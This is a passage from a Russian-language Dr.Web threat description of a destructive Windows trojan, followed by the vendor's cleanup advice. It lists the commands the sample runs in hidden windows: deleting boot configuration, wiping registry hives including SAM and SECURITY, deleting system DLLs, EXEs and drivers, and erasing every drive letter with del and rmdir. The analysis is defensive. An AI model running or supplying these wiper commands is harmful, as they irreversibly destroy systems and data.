  • <SYSTEM32>\wdigest.dll
  • <SYSTEM32>\wdscore.dll
  • <SYSTEM32>\webauthn.dll
  • <SYSTEM32>\webio.dll
  • <SYSTEM32>\webservices.dll
  • <SYSTEM32>\wer.dll
  • <SYSTEM32>\werconcpl.dll
  • <SYSTEM32>\wevtapi.dll
  • <SYSTEM32>\wevtsvc.dll
  • <SYSTEM32>\wfapigp.dll
  • <SYSTEM32>\win32spl.dll
  • <SYSTEM32>\win32u.dll
  • <SYSTEM32>\winbio.dll
  • <SYSTEM32>\wincorlib.dll
  • <SYSTEM32>\windowmanagement.dll
  • <SYSTEM32>\windowmanagementapi.dll
  • <SYSTEM32>\windows.applicationmodel.datatransfer.dll
  • <SYSTEM32>\windows.applicationmodel.dll
  • <SYSTEM32>\windows.cloudstore.dll
  • <SYSTEM32>\windows.cloudstore.schema.shell.dll
  • <SYSTEM32>\windows.devices.enumeration.dll
  • <SYSTEM32>\windows.fileexplorer.common.dll
  • <SYSTEM32>\windows.gaming.input.dll
  • <SYSTEM32>\windows.globalization.dll
  • <SYSTEM32>\windows.globalization.fontgroups.dll
  • <SYSTEM32>\windows.graphics.dll
  • <SYSTEM32>\windows.immersiveshell.serviceprovider.dll
  • <SYSTEM32>\windows.internal.shell.broker.dll
  • <SYSTEM32>\windows.internal.signals.dll
  • <SYSTEM32>\windows.internal.system.userprofile.dll
  • <SYSTEM32>\windows.internal.ui.shell.windowtabmanager.dll
  • <SYSTEM32>\windows.media.dll
  • <SYSTEM32>\windows.networking.backgroundtransfer.backgroundmanagerpolicy.dll
  • <SYSTEM32>\windows.networking.connectivity.dll
  • <SYSTEM32>\windows.networking.hostname.dll
  • <SYSTEM32>\windows.security.authentication.web.core.dll
  • <SYSTEM32>\windows.services.targetedcontent.dll
  • <SYSTEM32>\windows.shell.bluelightreduction.dll
  • <SYSTEM32>\windows.shell.servicehostbuilder.dll
  • <SYSTEM32>\windows.staterepository.dll
  • <SYSTEM32>\windows.staterepositorybroker.dll
  • <SYSTEM32>\windows.staterepositoryclient.dll
  • <SYSTEM32>\windows.staterepositorycore.dll
  • <SYSTEM32>\windows.staterepositoryps.dll
  • <SYSTEM32>\windows.storage.applicationdata.dll
  • <SYSTEM32>\windows.storage.dll
  • <SYSTEM32>\windows.system.launcher.dll
  • <SYSTEM32>\windows.ui.core.textinput.dll
  • <SYSTEM32>\windows.ui.dll
  • <SYSTEM32>\windows.ui.immersive.dll
  • <SYSTEM32>\windows.ui.input.inking.dll
  • <SYSTEM32>\windows.ui.shell.dll
  • <SYSTEM32>\windows.ui.xaml.controls.dll
  • <SYSTEM32>\windows.ui.xaml.dll
  • <SYSTEM32>\windows.ui.xaml.inkcontrols.dll
  • <SYSTEM32>\windows.ui.xaml.maps.dll
  • <SYSTEM32>\windows.ui.xaml.phone.dll
  • <SYSTEM32>\windows.ui.xaml.resources.19h1.dll
  • <SYSTEM32>\windows.ui.xaml.resources.common.dll
  • <SYSTEM32>\windows.web.dll
  • <SYSTEM32>\windows.web.http.dll
  • <SYSTEM32>\windowscodecs.dll
  • <SYSTEM32>\windowsudk.shellcommon.dll
  • <SYSTEM32>\winhttp.dll
  • <SYSTEM32>\wininet.dll
  • <SYSTEM32>\wininitext.dll
  • <SYSTEM32>\winmm.dll
  • <SYSTEM32>\winmmbase.dll
  • <SYSTEM32>\winnsi.dll
  • <SYSTEM32>\winrnr.dll
  • <SYSTEM32>\winsqlite3.dll
  • <SYSTEM32>\winsrv.dll
  • <SYSTEM32>\winsrvext.dll
  • <SYSTEM32>\winsta.dll
  • <SYSTEM32>\wintrust.dll
  • <SYSTEM32>\wintypes.dll
  • <SYSTEM32>\winusb.dll
  • <SYSTEM32>\wkscli.dll
  • <SYSTEM32>\wkssvc.dll
  • <SYSTEM32>\wlanapi.dll
  • <SYSTEM32>\wlanradiomanager.dll
  • <SYSTEM32>\wldap32.dll
  • <SYSTEM32>\wldp.dll
  • <SYSTEM32>\wlidprov.dll
  • <SYSTEM32>\wmasf.dll
  • <SYSTEM32>\wmiclnt.dll
  • <SYSTEM32>\wmidcom.dll
  • <SYSTEM32>\wmvcore.dll
  • <SYSTEM32>\wow64.dll
  • <SYSTEM32>\wow64cpu.dll
  • <SYSTEM32>\wow64win.dll
  • <SYSTEM32>\wpdshserviceobj.dll
  • <SYSTEM32>\wpnapps.dll
  • <SYSTEM32>\wpnclient.dll
  • <SYSTEM32>\wpncore.dll
  • <SYSTEM32>\wpnservice.dll
  • <SYSTEM32>\wpnuserservice.dll
  • <SYSTEM32>\wptaskscheduler.dll
  • <SYSTEM32>\ws2_32.dll
  • <SYSTEM32>\wscapi.dll
  • <SYSTEM32>\wscinterop.dll
  • <SYSTEM32>\wscsvc.dll
  • <SYSTEM32>\wsdapi.dll
  • <SYSTEM32>\wshbth.dll
  • <SYSTEM32>\wshhyperv.dll
  • <SYSTEM32>\wsnmp32.dll
  • <SYSTEM32>\wsock32.dll
  • <SYSTEM32>\wtsapi32.dll
  • <SYSTEM32>\wuapi.dll
  • <SYSTEM32>\wudfplatform.dll
  • <SYSTEM32>\wudfx.dll
  • <SYSTEM32>\wwanradiomanager.dll
  • <SYSTEM32>\wwapi.dll
  • <SYSTEM32>\xboxgipradiomanager.dll
  • <SYSTEM32>\xmllite.dll
  • <DRIVERS>\umdf\wpdfs.dll
Самоудаляется.
Другое
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /c bcdedit /delete >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c bcdedit /deletevalue >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete HKLM\SOFTWARE /f (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete HKLM\SYSTEM /f (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete HKLM\SAM /f (со скрытым окном)
  • '<SYSTEM32>\reg.exe' delete HKLM\SECURITY /f (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q <DRIVERS>\*.sys >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q <DRIVERSTORE>\*.inf >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q <SYSTEM32>\*.dll >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q %WINDIR%\SysWOW64\*.dll >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q <SYSTEM32>\*.exe >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q %WINDIR%\SysWOW64\*.exe >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q C:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q C:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q D:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q D:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q E:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q E:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q <Имя диска съемного носителя>:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q <Имя диска съемного носителя>:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q G:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q G:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q H:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q H:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q I:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q I:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q J:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q J:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q K:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q K:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q L:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q L:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q M:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\bcdedit.exe' /delete
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q M:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\bcdedit.exe' /deletevalue
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q N:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q N:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q O:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q O:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q P:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q P:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q Q:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q Q:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q R:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q R:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q S:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q S:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q T:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q T:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q U:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q U:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q V:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q V:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q W:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q W:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q X:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q X:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q Y:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q Y:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q Z:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q Z:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q *.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q .:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q .:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q :\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q :\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q /:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q /:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q ::\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q ::\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q \:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q \:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q 2:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q 2:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q >:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q >:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q &:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q &:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q 1:\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q 1:\ 2>nul (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c del /f /s /q :\*.* >nul 2>&1 (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c rmdir /s /q :\ 2>nul (со скрытым окном)

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке